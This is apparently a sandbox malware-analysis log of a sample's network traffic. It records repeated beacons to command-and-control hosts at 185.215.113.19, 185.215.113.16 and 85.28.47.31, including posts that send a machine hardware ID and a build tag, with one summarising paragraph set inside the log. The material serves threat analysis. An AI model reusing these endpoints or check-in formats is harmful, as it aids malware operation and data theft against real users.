Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 34 41 30 33 30 46 43 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="hwid"0374A030FCBF1079209047------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="build"sila------DGDBKFBAKFBFHIECFBFI--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
The four POST requests above recur in lock-step with byte-identical bodies throughout this part of the capture (in the original listing: 11 x /Vi9leo/index.php r=, 11 x /Vi9leo/index.php st=s, 10 x /Jo89Ku7d/index.php r=, 10 x /Jo89Ku7d/index.php st=s). Two hosts, 185.215.113.19 and 185.215.113.16, are polled in alternation, each with its own fixed 154-hex-character r= value (156-byte body) followed by the 4-byte st=s status ping; the r= value never changes between rounds, so it is a static encrypted registration blob rather than a per-request nonce.
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDAHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 34 41 30 33 30 46 43 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 2d 2d 0d 0a Data Ascii: ------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="hwid"0374A030FCBF1079209047------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="build"sila------GHJJDGHCBGDHIECBGIDA--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91 (3 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31 (47 connections)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1p5G+81pvP7punU&MD=N3O13Xaa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1p5G+81pvP7punU&MD=N3O13Xaa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
